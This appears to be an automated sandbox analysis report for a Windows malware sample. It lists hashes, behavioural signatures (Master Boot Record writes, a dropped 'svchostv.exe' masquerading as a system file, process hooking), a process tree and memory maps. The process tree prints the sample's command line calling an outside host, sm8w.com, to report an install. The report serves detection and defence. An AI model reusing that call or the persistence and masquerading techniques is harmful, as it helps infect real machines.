Analysis

  • max time kernel
    158s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-12-2022 00:21

General

  • Target

    cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe

  • Size

    43KB

  • MD5

    5aaacfe6da605b9f485db74a942b1a39

  • SHA1

    65cf036cddce15505bc80439ac5a1fc1b7ba0a71

  • SHA256

    cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc

  • SHA512

    3d62a5eb089b87faf80c35fc5529cea9f20c2f12b003939a183b433ff3c788a9fc59123317c4717a4adcaf2b4e8c73fe71194fa62ce0e2cb2070076c1c6bdea8

  • SSDEEP

    768:GVIBjr+Fhvd8lTadCnY3Yb87lNmq/kXuzo/0Jl11qZuk66XmXHt:Xhr+FhF8ZFYIGgVXXO14Z566XmXHt

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in Windows directory 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe
    "C:\Users\Admin\AppData\Local\Temp\cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4892
    • C:\Windows\svchostv.exe
      C:\Windows\svchostv.exe auto
      2⤵
      • Executes dropped EXE
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:2980
    • C:\progra~1\Intern~1\iexplore.exe
      C:\\progra~1\\Intern~1\\iexplore.exe http://sm8w.com/AddSetup.asp?id=666&localID=QM00013&isqq=3&Code=73706D73736D70727070627478727678777A6212F&ProcCount=81
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4904
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4904 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:4456

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    471B

    MD5

    8b90c80540ac0b7f86a00f00c7adb0e5

    SHA1

    a83d1a28ce3a71303dc0eb7359182812d74539c8

    SHA256

    47d6c62ae69a38a716da5db2d4b4c95193dc1dcbebef3c55dea8c0cfb13ea256

    SHA512

    546494549dbf6e3c8fc547c3269a3564c6ba6e34ba66df238f31f6b53a35f9b46f5973deb38c7a686ee89b484b95cb0be1c4b49b5c771d38d80d42eb66885cd3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    434B

    MD5

    758282b6d7f81aee6e20bfb6502c6ec4

    SHA1

    0d61194a7c325a704693db9eb9f1233ede33acc4

    SHA256

    b44f2008c0535e206302a9981e4fb0f890929cc4587ecc8a4fb0afe527c9b79f

    SHA512

    d2dea2cc6def07e08e17f6e362c1acd45ace2f336c139c1ae64db839a3d1c9ed49803a56bcd5aa550febd57c449fa5df0f5a96a9d765643468814ad214927b0b

  • C:\Windows\svchostv.exe

    Filesize

    43KB

    MD5

    5aaacfe6da605b9f485db74a942b1a39

    SHA1

    65cf036cddce15505bc80439ac5a1fc1b7ba0a71

    SHA256

    cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc

    SHA512

    3d62a5eb089b87faf80c35fc5529cea9f20c2f12b003939a183b433ff3c788a9fc59123317c4717a4adcaf2b4e8c73fe71194fa62ce0e2cb2070076c1c6bdea8

  • C:\Windows\svchostv.exe

    Filesize

    43KB

    MD5

    5aaacfe6da605b9f485db74a942b1a39

    SHA1

    65cf036cddce15505bc80439ac5a1fc1b7ba0a71

    SHA256

    cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc

    SHA512

    3d62a5eb089b87faf80c35fc5529cea9f20c2f12b003939a183b433ff3c788a9fc59123317c4717a4adcaf2b4e8c73fe71194fa62ce0e2cb2070076c1c6bdea8

  • memory/2980-135-0x0000000000000000-mapping.dmp

  • memory/2980-140-0x0000000000400000-0x000000000041F000-memory.dmp

    Filesize

    124KB

  • memory/2980-187-0x0000000000400000-0x000000000041F000-memory.dmp

    Filesize

    124KB

  • memory/4892-161-0x0000000000400000-0x000000000041F000-memory.dmp

    Filesize

    124KB

  • memory/4892-185-0x0000000000400000-0x000000000041F000-memory.dmp

    Filesize

    124KB

  • memory/4892-132-0x0000000000400000-0x000000000041F000-memory.dmp

    Filesize

    124KB

  • memory/4904-167-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-173-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-149-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-150-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-151-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-152-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-153-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-154-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-156-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-158-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-160-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-162-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-147-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-163-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-164-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-165-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-146-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-169-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-170-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-171-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-172-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-148-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-174-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-175-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-176-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-177-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-181-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-182-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-183-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-184-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-145-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-186-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-143-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-192-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-194-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-193-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-195-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-196-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-197-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-199-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-200-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-202-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-142-0x00007FFBEC920000-0x00007FFBEC98E000-memory.dmp

    Filesize

    440KB

  • memory/4904-141-0x0000000000000000-mapping.dmp